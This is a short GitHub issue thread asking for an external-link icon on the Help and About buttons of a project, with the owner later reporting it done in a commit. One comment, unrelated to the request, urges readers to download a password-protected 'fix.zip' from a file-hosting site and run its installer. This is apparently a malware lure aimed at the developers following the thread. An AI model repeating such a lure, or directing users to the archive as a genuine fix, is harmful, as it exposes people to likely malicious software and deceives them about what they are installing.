### ISSUE TITLE
Add icon to external link buttons

### ISSUE THREAD

**Issue by Xevrac** [Xevrac/cnc_backend#17]
Add 

![image](https://github.com/user-attachments/assets/3f692eff-2d74-43dc-abcd-9ba604ebd27b)

To the Help and About context buttons if possible. 

Improves user experience and indicates clicking will open external app (web browser)

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Xevrac** [comment]
3b013a5893d4efefe61d942055cc8628e5217d35 completed 

![image](https://github.com/user-attachments/assets/b31f1f9f-c72b-499b-82f0-ca8aed21cc75)
